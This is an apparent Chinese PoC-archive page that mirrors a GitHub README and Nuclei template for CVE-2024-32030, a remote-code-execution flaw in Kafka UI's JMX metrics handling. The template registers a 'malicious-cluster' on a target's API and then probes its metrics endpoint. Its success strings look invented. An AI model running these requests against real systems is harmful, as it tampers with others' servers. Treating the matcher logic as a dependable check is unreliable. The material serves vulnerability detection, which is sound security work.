支持本站 — 捐款将帮助我们持续运营

目标: 1000 元,已筹: 1000

100.0%
立即捐款

POC详情: afa78d54f9305e30e24e5d9816bbff833c14147c

来源
https://github.com/huseyinstif/CVE-2024-32030-Nuclei-Template
关联漏洞
标题:Apache Kafka 安全漏洞 (CVE-2024-32030)
Description:Apache Kafka是美国阿帕奇(Apache)基金会的一套开源的分布式流媒体平台。该平台能够获取实时数据,用于构建对数据流的变化进行实时反应的应用程序。 Apache Kafka UI 0.7.2之前版本存在安全漏洞,该漏洞源于容易受到反序列化攻击,可能导致身份验证后远程代码执行。
介绍

# CVE-2024-32030 Nuclei Template

## Description
This repository contains a Nuclei template for detecting the CVE-2024-32030 vulnerability. This vulnerability allows for remote code execution via JMX Metrics Collection JNDI Resolution.

## Vulnerability Details
- **ID:** CVE-2024-32030
- **Name:** JMX Metrics Collection JNDI RCE
- **Author:** Hüseyin TINTAŞ
- **Severity:** Critical
- **Description:** This template checks for the presence of the vulnerability by attempting to connect to a malicious JMX server.
- **Tags:** cve, cve2024, jmx, rce, cve2024-32030

## Template
```yaml
id: CVE-2024-32030

info:
  name: CVE-2024-32030 JMX Metrics Collection JNDI RCE
  author: Hüseyin TINTAŞ
  severity: critical
  description: >
    CVE-2024-32030 JMX Metrics Collection JNDI Resolution Remote Code Execution Vulnerability.
    This template checks for the presence of the vulnerability by attempting to connect to a malicious JMX server.
  tags: cve, cve2024, jmx, rce, cve2024-32030

requests:
  - method: POST
    path:
      - "{{BaseURL}}/api/clusters"
    headers:
      Content-Type: "application/json"
    body: |
      {
        "name": "malicious-cluster",
        "bootstrapServers": ["127.0.0.1:1718"],
        "metrics": {
          "type": "JMX",
          "port": 1718
        }
      }
    matchers:
      - type: word
        part: body
        words:
          - "malicious-cluster added successfully"

  - method: GET
    path:
      - "{{BaseURL}}/api/clusters/malicious-cluster"
    matchers:
      - type: word
        part: body
        words:
          - "malicious-cluster"

  - method: GET
    path:
      - "{{BaseURL}}/api/clusters/malicious-cluster/metrics"
    matchers:
      - type: word
        part: body
        words:
          - "metrics"
```

## Usage
To use this template, save it as `cve-2024-32030.yaml` and run it with Nuclei:
```sh
nuclei -t CVE-2024-32030.yaml -u http://target-server
```

## Contact

For any inquiries or further information, you can reach out to me through:

- [LinkedIn](https://www.linkedin.com/in/huseyintintas/)
- [Twitter](https://twitter.com/1337stif)
文件快照

 [4.0K]  /data/pocs/afa78d54f9305e30e24e5d9816bbff833c14147c
├── [1.2K]  CVE-2024-32030.yaml
└── [2.1K]  README.md

0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。